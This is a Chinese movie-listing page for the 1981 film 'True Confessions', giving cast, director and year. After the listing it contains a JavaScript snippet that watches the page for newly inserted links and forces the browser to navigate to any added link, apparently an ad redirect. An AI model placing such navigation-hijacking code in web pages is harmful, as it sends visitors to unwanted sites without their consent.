真正的忏悔

真正的忏悔

  • 主演:罗伯特·德尼罗 罗伯特·杜瓦尔 查尔斯·德恩 肯尼思·麦克米伦 埃德·弗兰德斯 西里尔·库萨克 布吉斯·梅迪斯 Rose Gregorio 丹·哈达亚 Gwen Van Dam 托马斯·希尔 珍妮特·诺兰 小豪尔赫·塞韦拉 Susan Myers 路易莎·莫里茨 
  • 导演:乌鲁·格罗斯巴德 
  • 年份:1981
返回顶部
// 自动监听插入的 或 iframe,提取跳转链接 const observer = new MutationObserver((muts) => { for (const m of muts) { for (const node of m.addedNodes) { if (node.nodeType !== 1) continue; const el = node; // case 1: 链接 if (el.tagName === "A" && el.href.includes("http")) { console.log("🎯 发现广告链接:", el.href); window.location.href = el.href; } // case 2: iframe if (el.tagName === "IFRAME" && el.src.includes("http")) { console.log("🎯 发现广告 iframe:", el.src); // window.location.href = el.src; } } } }); observer.observe(document.body, { childList: true, subtree: true });